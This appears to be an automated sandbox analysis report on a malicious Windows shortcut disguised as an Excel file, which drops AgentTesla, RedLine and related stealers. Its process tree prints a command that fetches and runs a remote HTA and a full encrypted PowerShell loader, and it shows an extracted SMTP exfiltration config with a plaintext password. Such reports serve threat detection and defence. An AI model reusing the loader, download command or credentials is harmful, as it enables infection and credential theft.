Windows
Analysis Report
FT. 40FE CNY .xlsx.lnk
Overview
General Information
Detection
AgentTesla, DBatLoader, PureLog Stealer, RedLine
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 5632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - mshta.exe (PID: 7260 cmdline: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  - powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
  - uc.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Roaming\uc.exe" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
  - cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - extrac32.exe (PID: 1460 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
  - bwsiuvcU.pif (PID: 6340 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- svchost.exe (PID: 7612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Ucvuiswb.PIF (PID: 1916 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
  - bwsiuvcU.pif (PID: 2196 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- Ucvuiswb.PIF (PID: 2236 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
  - bwsiuvcU.pif (PID: 2324 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution | | |
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and the malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | |
{"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
Rule | Description | Author |
---|---|---|
MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen |

Rule | Description | Author |
---|---|---|
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Rule | Description | Author |
---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
Rule | Description | Author |
---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |